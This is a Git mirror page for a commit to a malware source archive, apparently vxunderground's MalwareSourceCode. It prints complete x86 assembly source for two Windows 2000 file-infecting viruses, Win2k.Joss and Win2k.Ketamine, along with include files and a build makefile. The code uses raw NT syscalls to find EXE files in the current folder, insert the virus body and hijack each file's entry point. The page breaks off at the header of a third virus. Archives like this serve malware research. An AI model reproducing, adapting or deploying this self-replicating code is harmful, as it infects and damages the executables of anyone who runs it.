daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 15:29:23 +00:00
Code Issues Projects Releases Wiki Activity

Folder structure change, added README

Browse Source
This commit is contained in:
TheDuchy
2020-10-16 22:28:58 +02:00
parent 2114d4f5e7
commit d44d9b59a7
174 changed files with 14378 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
LegacyWindows/Win2k/Win2k.CannaByte.asm
+2480
View File
File diff suppressed because it is too large Load Diff
LegacyWindows/Win2k/Win2k.CannaByte.v2.asm
+2939
View File
File diff suppressed because it is too large Load Diff
LegacyWindows/Win2k/Win2k.DOB.asm
+1062
View File
File diff suppressed because it is too large Load Diff
LegacyWindows/Win2k/Win2k.Joss.asm
+715
View File
@@ -0,0 +1,715 @@
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[JOSS.ASM]ÄÄÄ
; Win2k.Joss by Ratter/29A
.586p
.model flat, stdcall
locals
include useful.inc
include win32api.inc
include mz.inc
include pe.inc
include my_macroz.inc
NtOpenFile equ 64h
NtQueryDirectoryFile equ 7dh
NtClose equ 18h
NtCreateSection equ 2bh
NtMapViewOfSection equ 5dh
NtUnmapViewOfSection equ 0e7h
unicode_string struc
us_length dw ?
dw ?
us_pstring dd ?
unicode_string ends
path_name struc
pn_name dw MAX_PATH dup(?)
path_name ends
object_attributes struc
oa_length dd ?
oa_rootdir dd ?
oa_objectname dd ?
oa_attribz dd ?
oa_secdesc dd ?
oa_secqos dd ?
object_attributes ends
pio_status_block struc
psb_ntstatus dd ?
psb_info dd ?
pio_status_block ends
@asciiz_to_unicode macro
xor ah, ah
lodsb
stosw
test al, al
jz $+4
jmp $-7
endm
@syscall macro fc, paramz
mov eax, fc
mov edx, esp
int 2eh
add esp, (paramz*4)
endm
.data
db ?
.code
start_:
_joss_start_ equ $
pushad
@SEH_SetupFrame <jmp joss_end>
bt dword ptr [esp+8+cPushad], 31
jc joss_end
start proc near
local trailings:unicode_string
local trailings_point_dir:path_name
local object_attribz:object_attributes
local dhandle:DWORD
local io_status_block:pio_status_block
local find_buffer:path_name
local wfnd:WIN32_FIND_DATA
mov dword ptr [trailings], 80008h
lea eax, [trailings_point_dir]
mov dword ptr [trailings.us_pstring], eax
@pushsz "\??\"
pop esi
xchg eax, edi
@asciiz_to_unicode
xor ecx, ecx
mov esi, 20290h
movzx eax, word ptr [trailings]
lea edi, [trailings_point_dir+eax]
lodsw
test ax, ax
jz $+7
inc ecx
stosw
jmp $-10
shl ecx, 1
add cx, word ptr [trailings]
mov ax, cx
shl ecx, 16
mov cx, ax
mov dword ptr [trailings], ecx
xor eax, eax
lea edi, [object_attribz]
push edi
push 18h/4
pop ecx
rep stosd
pop edi
push 18h
pop dword ptr [edi]
lea eax, [trailings]
mov dword ptr [edi+8], eax
push 40h
pop dword ptr [edi+12]
push 4021h
push 03h
lea eax, [io_status_block]
push eax
push edi
push 100001h
lea eax, [dhandle]
push eax
@syscall NtOpenFile, 6
mov ebx, dword ptr [dhandle]
xor ecx, ecx
main_loop:
push ecx
xor eax, eax
push eax
call $+13
dw 0ah
dw 0ah
dd ?
pop esi
call $+15
dw '<', '.', 'e', 'x', 'e'
pop edi
mov dword ptr [esi+4], edi
jecxz $+4
xor esi, esi
push esi
push 1
push 3
push MAX_PATH*2
lea edx, [find_buffer]
push edx
lea edx, [io_status_block]
push edx
push eax
push eax
push eax
push ebx
@syscall NtQueryDirectoryFile, 11
pop ecx
test eax, eax
jnz main_loop_end
push dword ptr [trailings]
lea esi, [find_buffer]
lea edi, [trailings]
call infect_file
pop dword ptr [trailings]
inc ecx
jmp main_loop
main_loop_end:
push ebx
@syscall NtClose, 1
leave
joss_end:
@SEH_RemoveFrame
popad
mov eax, offset end
host_start equ $-4
jmp eax
db 0, "[Win2k.Joss] by Ratter/29A", 0
infect_file proc near
local trailings_point_dir:path_name
local object_attribz:object_attributes
local dhandle:DWORD
local shandle:DWORD
local io_status_block:pio_status_block
local soffset:DWORD
local bytes:DWORD
local soffset_:QWORD
pushad
@SEH_SetupFrame <jmp infect_file_end>
movzx eax, word ptr [edi]
mov edx, dword ptr [edi+4]
push edi
lea edi, [edx+eax]
mov ecx, dword ptr [esi+3ch]
push ecx
lea esi, [esi+5eh]
rep movsb
pop ecx
pop edi
add cx, word ptr [edi]
mov ax, cx
shl ecx, 16
mov cx, ax
mov dword ptr [edi], ecx
xchg edi, esi
xor eax, eax
lea edi, [object_attribz]
push edi
push 18h/4
pop ecx
rep stosd
pop edi
push 18h
pop dword ptr [edi]
mov dword ptr [edi+8], esi
push 40h
pop dword ptr [edi+12]
push 4060h
push 03h
lea eax, [io_status_block]
push eax
push edi
push 100007h
lea eax, [dhandle]
push eax
@syscall NtOpenFile, 6
test eax, eax
jnz infect_file_end
xor eax, eax
push dword ptr [dhandle]
push 08000000h
push PAGE_READWRITE
push eax
push eax
push 0f0007h
lea eax, [shandle]
push eax
@syscall NtCreateSection, 7
test eax, eax
jnz infect_file_end_close_file
lea edi, [soffset]
std
mov ecx, 4
xor eax, eax
rep stosd
cld
xor eax, eax
push 4
push eax
push 1
lea edx, [bytes]
push edx
lea edx, [soffset_]
push edx
push eax
push eax
lea eax, [soffset]
push eax
push -1
push dword ptr [shandle]
@syscall NtMapViewOfSection, 10
test eax, eax
jnz infect_file_end_close_section
mov ebx, dword ptr [soffset]
;
call check_for_valid_pe
jc infect_file_end_unmap_view
jnz infect_file_end_unmap_view
cmp dword ptr [ebx.MZ_res], not "RAT"
jz infect_file_end_unmap_view
mov eax, dword ptr [ebx.MZ_lfanew]
add eax, ebx
movzx edi, word ptr [eax.NT_FileHeader.FH_SizeOfOptionalHeader]
lea edi, [edi+eax+IMAGE_SIZEOF_FILE_HEADER+4]
mov esi, dword ptr [edi.SH_PointerToRawData]
mov ecx, dword ptr [edi.SH_SizeOfRawData]
add esi, ebx
xor edx, edx
gap_loop:
jecxz gap_loop_end
lodsb
dec ecx
call is_gap
jz $+6
xor edx, edx
jmp gap_loop
inc edx
cmp edx, _joss_end_-_joss_start_
jnz gap_loop
gap_loop_end:
cmp edx, _joss_end_-_joss_start_
jnz infect_file_end_unmap_view
sub esi, _joss_end_-_joss_start_
push esi
sub esi, dword ptr [edi.SH_PointerToRawData]
pop edi
sub esi, ebx
push esi
call $+5
joss_here:
pop esi
sub esi, joss_here-_joss_start_
mov ecx, _joss_end_-_joss_start_
rep movsb
pop esi
mov eax, dword ptr [ebx.MZ_lfanew]
mov dword ptr [ebx.MZ_res], not "RAT"
add eax, ebx
and dword ptr [eax.NT_OptionalHeader.OH_CheckSum], 0
mov ecx, dword ptr [eax.NT_OptionalHeader.OH_ImageBase]
add ecx, dword ptr [eax.NT_OptionalHeader.OH_AddressOfEntryPoint]
mov dword ptr [edi-(_joss_end_-host_start)], ecx
mov edx, dword ptr [eax.NT_OptionalHeader.OH_BaseOfCode]
add edx, esi
mov dword ptr [eax.NT_OptionalHeader.OH_AddressOfEntryPoint], edx
;
infect_file_end_unmap_view:
push ebx
push -1
@syscall NtUnmapViewOfSection, 2
infect_file_end_close_section:
push dword ptr [shandle]
@syscall NtClose, 1
infect_file_end_close_file:
push dword ptr [dhandle]
@syscall NtClose, 1
infect_file_end:
@SEH_RemoveFrame
popad
leave
retn
infect_file endp
check_for_valid_pe:
pushad
movzx eax, word ptr [ebx]
not eax
cmp eax, not "ZM"
stc
jnz check_for_valid_pe_end
mov edx, dword ptr [ebx.MZ_lfanew]
add edx, ebx
movzx eax, word ptr [edx]
not eax
cmp eax, not "EP"
stc
jnz check_for_valid_pe_end
cmp word ptr [edx.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386
stc
jnz check_for_valid_pe_end
movzx eax, word ptr [edx.NT_FileHeader.FH_Characteristics]
not al
test eax, IMAGE_FILE_EXECUTABLE_IMAGE or IMAGE_FILE_DLL
clc
check_for_valid_pe_end:
popad
retn
is_gap:
cmp al, 90h
jz is_gap_end
cmp al, 0cch
jz is_gap_end
test al, al
jz is_gap_end
is_gap_end:
retn
_joss_end_ equ $
end:
push 0
calle ExitProcess
start endp
end start_
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[JOSS.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[JOSS.DEF]ÄÄÄ
NAME PREDLOHA WINDOWAPI
DESCRIPTION 'Predloha'
CODE PRELOAD MOVEABLE DISCARDABLE
DATA PRELOAD MOVEABLE MULTIPLE
EXETYPE WINDOWS
HEAPSIZE 131072
STACKSIZE 131072
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[JOSS.DEF]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[my_include.inc]ÄÄÄ
SERVICE_TABLE_ENTRY struc
STE_ServiceName dd ?
STE_ServiceProc dd ?
SERVICE_TABLE_ENTRY ends
SERVICE_STATUS struc
SS_ServiceType dd ?
SS_CurrentState dd ?
SS_ControlsAccepted dd ?
SS_Win32ExitCode dd ?
SS_ServiceSpecificExitCode dd ?
SS_CheckPoint dd ?
SS_WaitHint dd ?
SERVICE_STATUS ends
OVERLAPPED struc
O_Internal dd ?
O_InternalHigh dd ?
O_loffset dd ?
O_OffsetHigh dd ?
O_hEvent dd ?
OVERLAPPED ends
sockaddr_in struc
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup (?)
sockaddr_in ends
hostent struc
h_name dd ?
h_alias dd ?
h_addr dw ?
h_len dw ?
h_list dd ?
hostent ends
timeval struc
tv_sec dd ?
tv_usec dd ?
timeval ends
fd_set struc
fd_count dd ?
fd_array dd ?
fd_set ends
RASCONNSTATUSA struc
RCS_dwSize dd ?
RCS_rasconnstate dd ?
RCS_dwError dd ?
RCS_szDeviceType db 16 + 1 dup(?)
RCS_szDeviceName db 128 + 1 dup(?)
RASCONNSTATUSA ends
_email_ struc
EM_MailFrom dd ? ; pointer to ASCIIZ
EM_RcptTo dd ? ; pointer to ASCIIZ
EM_Subject dd ? ; pointer to ASCIIZ
EM_Message dd ? ; pointer to ASCIIZ
EM_FilezNum dd ? ; number of filez; if highest bit is set
; then in EM_Filez is a *.msg file
EM_Filez dd ? ; pointer to ASCIIZ pointerz
_email_ ends
SYSTEMTIME struc
ST_Year dw ?
ST_Month dw ?
ST_DayOfWeek dw ?
ST_Day dw ?
ST_Hour dw ?
ST_Minute dw ?
ST_Second dw ?
ST_Milliseconds dw ?
SYSTEMTIME ends
oper struc
OP_Oper dd ?
OP_Rites db ? ; 1 - RW; 0 - Ronly
oper ends
@copy macro source
local copy_end
local copy_loop
push esi
mov esi, source
copy_loop:
lodsb
test al, al
jz copy_end
stosb
jmp copy_loop
copy_end:
pop esi
endm
@endsz_ macro
local nxtchr
push esi
mov esi, edi
nxtchr:
lodsb
test al, al
jnz nxtchr
xchg esi, edi
pop esi
endm
@pushvar macro variable, empty
local next_instr
ifnb <empty>
%out too much arguments in macro '@pushvar'
.err
endif
call next_instr
variable
next_instr:
endm
CR_LF equ 0a0dh
WAIT_TIMEOUT equ 103h
SMTP_PORT equ 25
SC_MANAGER_CONNECT equ 1
SC_MANAGER_CREATE_SERVICE equ 2
DELETE equ 10000h
SERVICE_AUTO_START equ 2
SERVICE_WIN32_OWN_PROCESS equ 10h
SERVICE_ACCEPT_SHUTDOWN equ 4
SERVICE_CONTROL_RUN equ 0
CK_SERVICE_CONTROL equ 0
CK_PIPE equ 1
NO_ERROR equ 0
SERVICE_CONTROL_INTERROGATE equ 4
SERVICE_CONTROL_SHUTDOWN equ 5
SERVICE_STOPPED equ 1
SERVICE_START_PENDING equ 2
SERVICE_STOP_PENDING equ 3
SERVICE_RUNNING equ 4
SERVICE_CONTINUE_PENDING equ 5
SERVICE_PAUSE_PENDING equ 6
SERVICE_PAUSED equ 7
PIPE_ACCESS_OUTBOUND equ 2
PIPE_TYPE_BYTE equ 0
FILE_FLAG_OVERLAPPED equ 40000000h
INFINITE equ -1
AF_INET equ 2
HEAP_ZERO_MEMORY equ 8
SOCK_STREAM equ 1
CR_LF equ 0a0dh
MAX_ALLOWED_OPERZ equ 5
SYNCHRONIZE equ 100000h
RASCS_CONNECTED equ 2000h
MOVEFILE_DELAY_UNTIL_REBOOT equ 4
HKEY_LOCAL_MACHINE equ 80000002h
KEY_ENUMERATE_SUB_KEYS equ 8h
HKEY_USERS equ 80000003h
KEY_QUERY_VALUE equ 1
KEY_SET_VALUE equ 2
REG_SZ equ 1
REG_DWORD equ 4
ERROR_NO_MORE_ITEMS equ 259
INET_THREADZ_COUNT equ 2
INTERNET_OPEN_TYPE_DIRECT equ 1
POP3_PORT equ 110
OK equ " KO+"
ERROR equ "RRE-"
SOXZ_PORT equ 1080
STARTUPINFO STRUCT ;used by CreateProcessA API
cb DWORD ?
lpReserved DWORD ?
lpDesktop DWORD ?
lpTitle DWORD ?
dwX DWORD ?
dwY DWORD ?
dwXSize DWORD ?
dwYSize DWORD ?
dwXCountChars DWORD ?
dwYCountChars DWORD ?
dwFillAttribute DWORD ?
dwFlags DWORD ?
wShowWindow WORD ?
cbReserved2 WORD ?
lpReserved2 DWORD ?
hStdInput DWORD ?
hStdOutput DWORD ?
hStdError DWORD ?
STARTUPINFO ENDS
PROCESS_INFORMATION STRUCT
hProcess DWORD ?
hThread DWORD ?
dwProcessId DWORD ?
dwThreadId DWORD ?
PROCESS_INFORMATION ENDS
GMEM_ZEROINIT equ 040h
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[my_include.inc]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[my_macroz.inc]ÄÄÄ
@pushvar macro variable, empty
local next_instr
ifnb <empty>
%out too much arguments in macro '@pushvar'
.err
endif
call next_instr
variable
next_instr:
endm
@messagebox macro message, empty
ifnb <empty>
%out too much arguments in macro '@pushvar'
.err
endif
push 0
@pushsz "Debug"
@pushsz <message>
push 0
call MessageBoxA
endm
calle macro api
extrn api:PROC
call api
endm
@gimme_delta macro
local gimme_delta
call gimme_delta
gimme_delta:
mov esi, esp
lodsd
sub eax, offset gimme_delta
xchg eax, ebp
mov esp, esi
endm
calla macro api
call dword ptr [ebp+api]
endm
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[my_macroz.inc]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKEFILE]ÄÄÄ
# make Will build pemangle.exe
# make -B -DDEBUG Will build the debug version of pemangle.exe
NAME = joss
OBJS = $(NAME).obj
DEF = $(NAME).def
!if $d(DEBUG)
TASMDEBUG=/zi /m
LINKDEBUG=/v
!else
TASMDEBUG=/m
LINKDEBUG=
!endif
!if $d(MAKEDIR)
IMPORT=import32.lib # Edit this to point your own library path
!else
IMPORT=import32.lib # or put the file in the same directory
!endif
$(NAME).EXE: $(OBJS) $(DEF)
tlink32 /Tpe /aa /c /x $(LINKDEBUG) $(OBJS),$(NAME),, $(IMPORT), $(DEF)
pewrite.exe $(NAME).exe
del $(OBJS)
.asm.obj:
tasm32 $(TASMDEBUG) /ml /i..\..\includes $&.asm
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MAKEFILE]ÄÄÄ
LegacyWindows/Win2k/Win2k.Ketamine.asm
+547
View File
@@ -0,0 +1,547 @@
COMMENT#
Ú¿
ÃÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅ´
ÃÅÅÅÅÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÅÅÅÅ´
ÃÅÅÅ´ Win2k.Ketamine ÃÅÅÅ´
ÃÅÅÅ´ by Benny/29A ÃÅÅÅ´
ÃÅÅÅÅÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÅÅÅÅ´
ÃÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅ´
ÀÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÙ
This is my next (very small) virus, specialised on Win2k machinez. It should be also
able to run under WinNT machinez, but I'm not sure, becoz I didn't test it. The virus
does not use any APIz, instead of that, its uses NT syscallz. The virus does not do
anything special apart of that, it can only infect all EXE filez in current folder
and does not manifest itself in any way. Infected filez have the same size, becoz
virus overwritez the relocation section. The virus should be compatible with newer
versionz of Windows OS'ez based on NT system. The only point of incompatibility is,
becoz I decided to not use ANY API, the code where the virus expect the fixed address
of NTDLL.dll modul loaded in process virtual memory. Virus searchez inside the NTDLL.dll
for syscall numberz and so it SHOULD be forward compatible. At least a bit...;-)
Here I have to thank Ratter, he inspired me a lot with his Win2k.Joss. The functionality
of Win2k.Ketamine and Win2k.Joss is almost the same, I only recoded some of his code on my
own and added a few new ideaz, which should make Ketamine more compatible with Windows,
rather than Joss. I have to say, that he inspired me a lot, but the code is not ripped. I
also disassembled NTDLL.dll and NTOSKRNL.EXE and found the same resultz as him, surprisely ;-D
But ofcoz, I decided to not discover the America again and so I used some of his code in
my virus.
The virus was coded only to show that something is possible, not to make high-spreading virus.
Enjoy it!
(c)oded in August, 2001
Czech Republic.
#
.386p
.model flat,stdcall
locals
include win32api.inc
include useful.inc
include mz.inc
include pe.inc
invoke macro api ;macro for API callz
extrn api:PROC
call api
endm
unicode_string struc
us_length dd ? ;length of the string
us_pstring dd ? ;ptr to string
unicode_string ends
path struc
p_path dw MAX_PATH dup (?) ;maximal length of path in unicode
path ends
object_attributes struc
oa_length dd ? ;length of structure
oa_rootdir dd ?
oa_objectname dd ? ;name of object
oa_attribz dd ? ;attributez of the object
oa_secdesc dd ?
oa_secqos dd ?
object_attributes ends
pio_status struc ;status structure
ps_ntstatus dd ?
ps_info dd ?
pio_status ends
.data
db ? ;some data
.code
_Start: pushad
gdelta = $+5 ;delta offset
@SEH_SetupFrame <jmp end_seh>
mov edx,cs
xor dl,dl
jne end_seh ;must be under winNT/2k!
mov ebp,[esp+4]
call get_syscalls ;get numberz of all needed syscallz
Start Proc
local uni_string:unicode_string
local u_string:path
local object_attr:object_attributes
local io_status:pio_status
local dHandle:DWORD
local WFD:WIN32_FIND_DATA
mov [uni_string.us_length],80008h ;length of the string
lea edi,[u_string]
mov [uni_string.us_pstring],edi ;set the pointer
call @qm
dw '\','?','?','\' ;initial string of the object
@qm: pop esi
movsd
movsd ;save it
mov esi,fs:[18h]
mov esi,[esi+30h]
mov esi,[esi+10h]
add esi,24h
mov esi,[esi+4] ;ESI = current folder
xor ecx,ecx
l_copy: lodsw
inc ecx
stosw ;append it
test eax,eax
jne l_copy
dec ecx
lea edi,[uni_string]
shl ecx,1
add cx,[edi]
mov ax,cx
shl ecx,16
mov cx,ax
mov [edi],ecx ;save the new length
xor ecx,ecx ;initialize the structure ...
lea eax,[uni_string]
lea edi,[object_attr]
mov [edi.oa_length],24
and [edi.oa_rootdir],ecx
mov [edi.oa_objectname],eax
mov [edi.oa_attribz],40h
and [edi.oa_secdesc],ecx
and [edi.oa_secqos],ecx
push 4021h
push 3h
lea eax,[io_status]
push eax
push edi
push 100001h
lea ebx,[dHandle]
push ebx
call NtOpenFile ;open the current folder
mov ebx,[ebx]
xor ecx,ecx
f_loop: push ecx
xor eax,eax
push eax
call @p1
dd 0A000Ah ;length of the string
dd ? ;ptr to string
@p1: pop esi
call @exe
dw '<','.','E','X','E' ;string
@exe: pop dword ptr [esi+4] ;save the ptr
jecxz @1st
xor esi,esi
@1st: push esi
push 1
push 3
push MAX_PATH*2
lea edx,[WFD]
push edx
lea edx,[io_status]
push edx
push eax
push eax
push eax
push ebx
mov eax,12345678h
NtQDF = dword ptr $-4
lea edx,[esp]
int 2Eh ;NtQueryDirectoryFile
add esp,4*11 ;correct the stack
pop ecx
test eax,eax
jne e_loop ;quit if no more file
push dword ptr [uni_string] ;save the length
lea esi,[WFD] ;WIN32_FIND_DATA structure
lea edi,[uni_string] ;the filename
call infect_file ;infect the file
pop dword ptr [uni_string] ;restore the length
inc ecx
jmp f_loop ;find next file
e_loop: push ebx
call NtClose ;close the directory
leave
end_seh:@SEH_RemoveFrame
popad
extrn ExitProcess:PROC
push cs
push offset ExitProcess
original_ep = dword ptr $-4
retf ;jump to host!
Start EndP
NtClose:mov eax,12345678h
NtC = dword ptr $-4
lea edx,[esp+4]
int 2Eh ;close the handle
ret 4
NtOpenFile:
mov eax,12345678h
NtOF = dword ptr $-4
lea edx,[esp+4]
int 2Eh ;open the object
ret 4*6
infect_file Proc
local object_attr:object_attributes
local io_status:pio_status
local fHandle:DWORD
local sHandle:DWORD
local sOffset:DWORD
local bytez:DWORD
local sOffset2:QWORD
pushad
@SEH_SetupFrame <jmp if_end>
movzx edx,word ptr [edi]
add edx,[edi+4]
push edi
mov edi,edx ;EDI - end of string
mov ecx,[esi+3Ch] ;size of filename
push ecx
lea esi,[esi+5Eh] ;filename
rep movsb ;copy the string
pop ecx
pop edi
add cx,[edi]
mov ax,cx
shl ecx,16
mov cx,ax
mov [edi],ecx ;size of path+filename
xchg eax,edi
xor ecx,ecx ;initialize the structure...
lea edi,[object_attr]
mov [edi.oa_length],24
and [edi.oa_rootdir],ecx
mov [edi.oa_objectname],eax
mov [edi.oa_attribz],40h
and [edi.oa_secdesc],ecx
and [edi.oa_secqos],ecx
push 4060h
push 3h
lea ecx,[io_status]
push ecx
push edi
push 100007h
lea ebx,[fHandle]
push ebx
call NtOpenFile ;open the file
test eax,eax
jne if_end
mov ebx,[ebx]
xor eax,eax
push ebx
push 8000000h
push PAGE_READWRITE
push eax
push eax
push 0F0007h
lea ebx,[sHandle]
push ebx
mov eax,12345678h
NtCS = dword ptr $-4
mov edx,esp
int 2Eh ;NtCreateSection
add esp,4*7 ;correct stack
test eax,eax
jne if_end2
mov ebx,[ebx]
lea edx,[bytez] ;initialize some variablez
xor eax,eax
and [sOffset],eax
and [edx],eax
and dword ptr [sOffset2],eax
and dword ptr [sOffset2+4],eax
push 4
push eax
push 1
push edx
lea edx,[sOffset2]
push edx
push eax
push eax
lea esi,[sOffset]
push esi
push -1
push ebx
mov eax,12345678h
NtMVOS = dword ptr $-4
mov edx,esp
int 2Eh ;NtMapViewOfSection
add esp,4*10
test eax,eax
jne if_end3
mov ebx,[esi] ;EBX = start of memory-mapped file
mov esi,[ebx.MZ_lfanew]
add esi,ebx
mov eax,[esi]
add eax,-IMAGE_NT_SIGNATURE
jne if_end4 ;must be PE file
;discard not_executable and system filez
cmp word ptr [esi.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386
jne if_end4
mov ax,[esi.NT_FileHeader.FH_Characteristics]
test ax,IMAGE_FILE_EXECUTABLE_IMAGE
je if_end4
test ax,IMAGE_FILE_DLL
jne if_end4
test ax,IMAGE_FILE_SYSTEM
jne if_end4
mov al,byte ptr [esi.NT_FileHeader.OH_Subsystem]
test al,IMAGE_SUBSYSTEM_NATIVE
jne if_end4
movzx eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
dec eax
test eax,eax
je if_end4
imul eax,eax,IMAGE_SIZEOF_SECTION_HEADER
movzx edx,word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
lea edi,[eax+edx+IMAGE_SIZEOF_FILE_HEADER+4]
add edi,esi
lea edx,[esi.NT_OptionalHeader.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
mov eax,[edx]
test eax,eax
je if_end4
cmp eax,[edi.SH_VirtualAddress]
jne if_end4
cmp [edi.SH_SizeOfRawData],virus_end-_Start
jb if_end4 ;is it large enough?
pushad
xor eax,eax
mov edi,edx
stosd
stosd
popad ;erase relocs record
;align the section size
mov eax,virus_end-_Start
cmp eax,[edi.SH_VirtualSize]
jb o_vs
mov ecx,[esi.NT_OptionalHeader.OH_SectionAlignment]
cdq
div ecx
test edx,edx
je o_al
inc eax
o_al: mul ecx
mov [edi.SH_VirtualSize],eax
o_vs: push ebp ;save EBP
call idelta ;get delta offset
idelta: pop ebp
push dword ptr [ebp + original_ep - idelta]
mov eax,[esi.NT_OptionalHeader.OH_AddressOfEntryPoint]
push dword ptr [edi.SH_VirtualAddress]
pop dword ptr [esi.NT_OptionalHeader.OH_AddressOfEntryPoint]
mov [ebp + original_ep - idelta],eax
mov eax,[esi.NT_OptionalHeader.OH_ImageBase]
add [ebp + original_ep - idelta],eax
;set saved_entrypoint variable
pushad
mov edi,[edi.SH_PointerToRawData]
add edi,ebx
lea esi,[ebp + _Start - idelta]
mov ecx,(virus_end-_Start+3)/4
rep movsd ;overwrite relocs by virus body
popad
pop dword ptr [ebp + original_ep - idelta]
;restore used variablez
or dword ptr [edi.SH_Characteristics],IMAGE_SCN_MEM_WRITE
pop ebp ;restore EBP
if_end4:push ebx
push -1
mov eax,12345678h
NtUVOS = dword ptr $-4
mov edx,esp
int 2Eh ;NtUnmapViewOfSection
add esp,4*2
if_end3:push [sHandle]
call NtClose ;close the section
if_end2:push [fHandle]
call NtClose ;close the file
if_end: @SEH_RemoveFrame
popad
ret
infect_file EndP
get_syscalls Proc
mov esi,77F80000h ;base of NTDLL.dll
mov edx,[esi.MZ_lfanew]
add edx,esi
mov ebx,[edx.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
add ebx,esi
mov ecx,[ebx.ED_NumberOfNames]
mov edx,[ebx.ED_AddressOfNames]
add edx,esi
xor eax,eax
c_find: pushad
add esi,[edx+eax*4]
push esi
@endsz
mov edi,esi
pop esi
sub edi,esi
call CRC32 ;calculate CRC32 of the API
push 6 ;number of syscallz
pop ecx
call @callz
dd 09ECA4E0Fh ;NtOpenFile
dd 0D5494178h ;NtQueryDirectoryFile
dd 0B964B7BEh ;NtClose
dd 03F2482E6h ;NtCreateSection
dd 010710614h ;NtMapViewOfSection
dd 0864CF09Bh ;NtUnmapViewOfSection
@callz: pop edx
c_look: cmp [edx-4+(ecx*4)],eax
je got_call
loop c_look
c_out: popad
inc eax
loop c_find
ret
got_call:
mov edx,[ebx.ED_AddressOfOrdinals]
mov esi,[esp.Pushad_esi]
add edx,esi
mov eax,[esp.Pushad_eax]
movzx eax,word ptr [edx+eax*2]
mov edx,esi
add edx,[ebx.ED_AddressOfFunctions]
mov eax,[edx+eax*4]
add eax,esi
mov eax,[eax+1] ;get number of the syscall
lea edx,[ebp + _Start - gdelta]
add edx,[ebp + sys_addr-4+ecx*4 - gdelta]
mov [edx],eax ;save it
jmp c_out
get_syscalls EndP
sys_addr: ;where to save syscall numberz...
dd offset NtOF-_Start
dd offset NtQDF-_Start
dd offset NtC-_Start
dd offset NtCS-_Start
dd offset NtMVOS-_Start
dd offset NtUVOS-_Start
CRC32: push ecx ;procedure for calculating CRC32s
push edx ;at run-time
push ebx
xor ecx,ecx
dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jne NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
ret
signature db 0,'WinNT.Ketamine by Benny/29A',0
virus_end:
End _Start
LegacyWindows/Win2k/Win2k.Society.3434.asm
+2557
View File
File diff suppressed because it is too large Load Diff
LegacyWindows/Win2k/Win2k.Stream.asm
+634
View File
@@ -0,0 +1,634 @@
COMMENT#
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Win2k.Stream ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
